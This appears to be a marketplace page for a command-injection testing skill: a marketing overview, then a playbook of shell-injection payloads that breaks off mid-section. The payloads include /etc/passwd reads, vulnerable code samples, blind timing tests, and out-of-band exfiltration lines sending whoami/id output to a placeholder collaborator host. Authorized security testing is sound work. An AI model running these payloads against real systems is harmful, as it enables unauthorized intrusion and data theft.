Cmdi Command Injection
Run a structured command-injection test playbook when user input might reach shells, converters, or blind out-of-band sinks in your own app or staging environment.
Overview
cmdi-command-injection is an agent skill most often used in Ship (also Build integrations, Operate iterate) that walks through shell metacharacter, blind, and out-of-band command-injection test patterns when user input m
Install
npx skills add https://github.com/yaklang/hack-skills --skill cmdi-command-injectionWhat is this skill?
- Shell metacharacter reference table with separator, pipe, and substitution behaviors
- First-pass payload families for generic separators, quoted args, blind timing, and OOB DNS
- Blind injection coverage including time-based detection and out-of-band exfiltration paths
- Polyglot and encoding tricks such as IFS, brace expansion, and newline-separated commands
- Routes to upload-insecure-files when the sink sits inside import or conversion workflows
- First-pass table covers five injection contexts including generic separator, quoted argument, blind timing, substitution
- Dedicated shell metacharacter reference section for injection operators
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).
What problem does it solve?
You suspect shell execution in your stack but only test obvious separators and miss blind timing, substitution, and import-pipeline sinks.
Who is it for?
Solo builders and small teams auditing their own APIs, CLIs, or import pipelines in staging with agent-assisted security review.
Skip if: Teams without authorization to test a system, or builders who need compliance automation instead of manual offensive test patterns.
When should I use this skill?
User input may reach shell commands, process execution, converters, import pipelines, or blind out-of-band command sinks.
What do I get? / Deliverables
You get a repeatable injection playbook with context-specific starter payloads and routing to related upload workflows so you can document and fix sinks before release.
- Context-mapped injection payload families and metacharacter test notes
- Blind and OOB detection steps tied to the suspected sink
Recommended Skills
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Canonical shelf on Ship because exploitation playbooks belong with pre-release security hardening and penetration-style verification, not greenfield feature work. Security subphase groups offensive test patterns with other app-hardening and review skills solo builders use before exposing APIs and admin tools.
Where it fits
Map shell calls inside a PDF or media converter before you wire untrusted uploads to it.
Run separator and substitution payload families against admin endpoints in staging pre-release.
Reproduce a reported injection suspicion in a background job without guessing metacharacters in chat.
How it compares
Use as a focused injection playbook rather than a generic secure-coding linter or passive dependency scanner.
Common Questions / FAQ
Who is cmdi-command-injection for?
It is for indie developers and security-minded builders who ship backends, CLIs, or file-processing features and need structured command-injection test ideas during authorized reviews.
When should I use cmdi-command-injection?
Use it in Ship security review when validating APIs before launch, in Build integrations when wiring shell-backed converters, and in Operate iterate when reproducing suspected injection in staging.
Is cmdi-command-injection safe to install?
Treat it as offensive security guidance—only run tests on systems you own or are permitted to test, and review the Security Audits panel on this Prism page before installing.
SKILL.md
READMESKILL.md - Cmdi Command Injection
# SKILL: OS Command Injection — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert command injection techniques. Covers all shell metacharacters, blind injection, time-based detection, OOB exfiltration, polyglot payloads, and real-world code patterns. Base models miss subtle injection through unexpected input vectors. ## 0. RELATED ROUTING Before going deep, you can first load: - [upload insecure files](../upload-insecure-files/SKILL.md) when the shell sink is part of a broader upload, import, or conversion workflow ### First-pass payload families | Context | Start With | Backup | |---|---|---| | generic shell separator | `;id` | `&&id` | | quoted argument | `";id;"` | `';id;'` | | blind timing | `;sleep 5` | `& timeout /T 5 /NOBREAK` | | command substitution | `$(id)` | `` `id` `` | | out-of-band DNS | `;nslookup token.collab` | Windows `nslookup` variant | ```text cat$IFS/etc/passwd {cat,/etc/passwd} %0aid ``` --- ## 1. SHELL METACHARACTERS (INJECTION OPERATORS) These characters break out of the command context and inject new commands: | Metacharacter | Behavior | Example | |---|---|---| | `;` | Runs second command regardless | `dir; whoami` | | `\|` | Pipes stdout to second command | `dir \| whoami` | | `\|\|` | Run second only if first FAILS | `dir \|\| whoami` | | `&` | Run second in background (or sequenced in Windows) | `dir & whoami` | | `&&` | Run second only if first SUCCEEDS | `dir && whoami` | | `$(cmd)` | Command substitution | `echo $(whoami)` | | `` `cmd` `` | Command substitution (backtick) | `` echo `whoami` `` | | `>` | Redirect stdout to file | `cmd > /tmp/out` | | `>>` | Append to file | `cmd >> /tmp/out` | | `<` | Read file as stdin | `cmd < /etc/passwd` | | `%0a` | Newline character (URL-encoded) | `cmd%0awhoami` | | `%0d%0a` | CRLF | Multi-command injection | --- ## 2. COMMON VULNERABLE CODE PATTERNS ### PHP ```php $dir = $_GET['dir']; $out = shell_exec("du -h /var/www/html/" . $dir); // Inject: dir=../ ; cat /etc/passwd // Inject: dir=../ $(cat /etc/passwd) exec("ping -c 1 " . $ip); // $ip = "127.0.0.1 && cat /etc/passwd" system("convert " . $file); // ImageMagick RCE passthru("nslookup " . $host); // $host = "x.com; id" ``` ### Python ```python import os os.system("curl " + url) # url = "x.com; id" subprocess.call("ls " + path, shell=True) # shell=True is the key vulnerability os.popen("ping " + host) ``` ### Node.js ```javascript const { exec } = require('child_process'); exec('ping ' + req.query.host, ...); // host = "x.com; id" ``` ### Perl ```perl $dir = param("dir"); $command = "du -h /var/www/html" . $dir; system($command); // Inject dir field: | cat /etc/passwd ``` ### ASP (Classic) ```vb szCMD = "type C:\logs\" & Request.Form("FileName") Set oShell = Server.CreateObject("WScript.Shell") oShell.Run szCMD // Inject FileName: foo.txt & whoami > C:\inetpub\wwwroot\out.txt ``` --- ## 3. BLIND COMMAND INJECTION — DETECTION When response shows no command output: ### Time-Based Detection ```bash # Linux: ; sleep 5 | sleep 5 $(sleep 5) `sleep 5` & sleep 5 & # Windows: & timeout /T 5 /NOBREAK & ping -n 5 127.0.0.1 & waitfor /T 5 signal777 ``` Compare response time without payload vs with payload. 5+ second delay = confirmed. ### OOB via DNS ```bash # Linux: ; nslookup BURP_COLLAB_HOST ; host `whoami`.BURP_COLLAB_HOST $(nslookup $(whoami).BURP_COLLAB_HOST) # Windows: & nslookup BURP_COLLAB_HOST & nslookup %USERNAME%.BURP_COLLAB_HOST ``` ### OOB via HTTP ```bash # Linux: ; curl http://BURP_COLLAB_HOST/`whoami` ; wget http://BURP_COLLAB_HOST/$(id|base64) # Windows: & powershell -c "Invoke-WebRequest http://BURP_COLLAB_HOST/$(whoami)" ``` ### OOB via Out-of-Band File ```bash ; id > /var/www/html/RANDOM_FILE.txt # Then access: http